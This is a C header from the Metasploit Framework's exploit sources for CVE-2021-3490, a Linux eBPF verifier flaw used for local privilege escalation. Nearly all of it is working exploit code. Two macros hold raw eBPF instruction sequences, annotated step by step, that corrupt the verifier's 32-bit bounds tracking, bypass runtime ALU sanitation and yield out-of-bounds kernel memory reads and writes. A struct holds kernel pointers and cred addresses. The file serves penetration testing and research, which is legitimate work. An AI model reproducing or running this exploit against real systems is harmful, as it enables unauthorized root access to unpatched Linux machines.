rapid7/metasploit-framework

View on GitHub
external/source/exploits/CVE-2021-3490/Linux_LPE_eBPF_CVE-2021-3490/include/exploit_configs.h

Summary

Maintainability
Test Coverage
#ifndef _EXPLOIT_CONFIGS_H_
#define _EXPLOIT_CONFIGS_H_

#define ARRAY_MAP_SIZE 0x1337
#define DUMMY_MAP_ADD  0x1000

#define EXPLOIT_STATE_CLEAN 0
#define EXPLOIT_STATE_READ  1
#define EXPLOIT_STATE_WRITE 2

#define STORE_MAP_REG    BPF_REG_2
#define OOB_MAP_REG      BPF_REG_3
#define EXPLOIT_REG      BPF_REG_4
#define CONST_REG        BPF_REG_5
#define LEAK_VAL_REG     BPF_REG_6
#define UNKOWN_VALUE_REG BPF_REG_7
#define COPY_REG         BPF_REG_8


typedef struct exploit_context
{
    int oob_map_fd;
    int store_map_fd;
    int prog_fd;
    uint64_t oob_map_ptr;
    uint64_t array_map_ops;
    uint64_t init_pid_ns_kstrtab;
    uint64_t init_pid_ns;
    uint64_t cred;
    uint32_t state;
} exploit_context;


// The exploit primitive is an eBPF program contained into two parts. The first part only triggers the bug, where EXPLOIT_REG will have incorrect 32 bit bounds (u32_min_value=1,u32_max_value=0). 
// The second part causes the eBPF verifier to believe EXPLOIT_REG has a value of 0 but actually has a runtime value of 1. It is split into two parts because we only need the first part to leak
// the pointer to the BPF array map used for OOB read/writes. 

#define exploit_primitive_pt1(oob_map_fd, store_map_fd) \
/* load oob_map values ptr into reg_0 */ \
BPF_MOV64_IMM(BPF_REG_0, 0), \
BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -4), \
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4), \
BPF_LD_MAP_FD(BPF_REG_1, oob_map_fd), \
BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), \
/* check if the returned map value pointer is valid */ \
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), \
BPF_EXIT_INSN(), \
/* save oob map value ptr into preserved register reg_7 */ \
BPF_MOV64_REG(BPF_REG_7, BPF_REG_0), \
/* load store_map values ptr into reg_0 */ \
BPF_MOV64_IMM(BPF_REG_0, 0), \
BPF_STX_MEM(BPF_W, BPF_REG_10, BPF_REG_0, -4), \
BPF_MOV64_REG(BPF_REG_2, BPF_REG_10), \
BPF_ALU64_IMM(BPF_ADD, BPF_REG_2, -4), \
BPF_LD_MAP_FD(BPF_REG_1, store_map_fd), \
BPF_RAW_INSN(BPF_JMP | BPF_CALL, 0, 0, 0, BPF_FUNC_map_lookup_elem), \
/* check if the returned map value pointer is valid */ \
BPF_JMP_IMM(BPF_JNE, BPF_REG_0, 0, 1), \
BPF_EXIT_INSN(), \
/* store the map value pointer into designated register */ \
BPF_MOV64_REG(STORE_MAP_REG, BPF_REG_0),\
/* save the oob map value pointer in the designated register */ \
BPF_MOV64_REG(OOB_MAP_REG, BPF_REG_7), \
/* prepare return value in reg_0 */ \
BPF_MOV32_IMM(BPF_REG_0, 0), \
/* load "unknown" value from the map, the real runtime value is 0 */ \
BPF_LDX_MEM(BPF_DW, UNKOWN_VALUE_REG, STORE_MAP_REG, 0), \
/* load "unknown" value into exploit register so it begins with a tnum mask of 0xFFFFFFFFFFFFFFFF */ \
BPF_MOV64_REG(EXPLOIT_REG, UNKOWN_VALUE_REG), \
/* constant register value is 0xFFFFFFFF */ \
BPF_MOV32_IMM(CONST_REG, 0xFFFFFFFF), \
/* constant register value is 0xFFFFFFFF00000000 */ \
BPF_ALU64_IMM(BPF_LSH, CONST_REG, 32), \
/* exploit register has tnum mask of 0xFFFFFFFF00000000 since now the bottom 32 bits are known to be 0 */ \
BPF_ALU64_REG(BPF_AND, EXPLOIT_REG, CONST_REG), \
/* exploit register has tnum value 0x1 and mask of 0xFFFFFFFF00000000 */ \
BPF_ALU64_IMM(BPF_ADD, EXPLOIT_REG, 1), \
/* constant register value is 0x1 */ \
BPF_MOV64_IMM(CONST_REG, 0x1), \
/* constant register value is 0x100000000 */ \
BPF_ALU64_IMM(BPF_LSH, CONST_REG, 32), \
/* constant register value is 0x100000002 */ \
BPF_ALU64_IMM(BPF_ADD, CONST_REG, 2), \
/* trigger the bug, exploit register has u32_min_value=1,u32_max_value=0 */ \
BPF_ALU64_REG(BPF_AND, EXPLOIT_REG, CONST_REG)

#define exploit_primitive_pt2 \
/* exploit register has u32_min_value=2,u32_max_value=1 */ \
BPF_ALU64_IMM(BPF_ADD, EXPLOIT_REG, 1), \
/* conditional so that unknown value register has u32_min_value=0,u32_max_value=1 */ \
BPF_JMP32_IMM(BPF_JLE, UNKOWN_VALUE_REG, 1, 1), \
BPF_EXIT_INSN(), \
/* bounds from each register are added, exploit reg now has u32_min_value=u32_max_value=2, verifier believes lower 32 bits are constant and equal to 2 */ \
BPF_ALU64_REG(BPF_ADD, EXPLOIT_REG, UNKOWN_VALUE_REG), \
/* clear the top 32 bits, verifier believes exploit reg is constant value of 2 (during runtime the value is 1) */ \
BPF_MOV32_REG(EXPLOIT_REG, EXPLOIT_REG), \
/* verifier believes exploit register is 0, because 2 & 1 = 0, runtime value is still 1 */ \
BPF_ALU64_IMM(BPF_AND, EXPLOIT_REG, 1), \
/* make a copy of exploit register to do dummy map operations */\
BPF_MOV64_REG(COPY_REG, EXPLOIT_REG), \
/* add a constant value to map value pointer to set alu_limit = DUMMY_MAP_ADD, to bypass runtime ALU sanitation */ \
BPF_ALU64_IMM(BPF_ADD, OOB_MAP_REG, DUMMY_MAP_ADD), \
/* copy register value is DUMMY_MAP_ADD - 1, verifier believes it is 0 */\
BPF_ALU64_IMM(BPF_MUL, COPY_REG, DUMMY_MAP_ADD - 1), \
/* subtract DUMMY_MAP_ADD we just added to map value pointer, because verifier believes copy register is 0, alu_limit remains unchanged */ \
BPF_ALU64_REG(BPF_SUB, OOB_MAP_REG, COPY_REG), \
/* subtract the remaining byte, so runtime ALU sanitation checks are passed on versions not patched for CVE-2020-27171 */ \
BPF_ALU64_REG(BPF_SUB, OOB_MAP_REG, EXPLOIT_REG)


int kernel_read(exploit_context* pCtx, uint64_t addr, char* buffer, uint32_t len);

#endif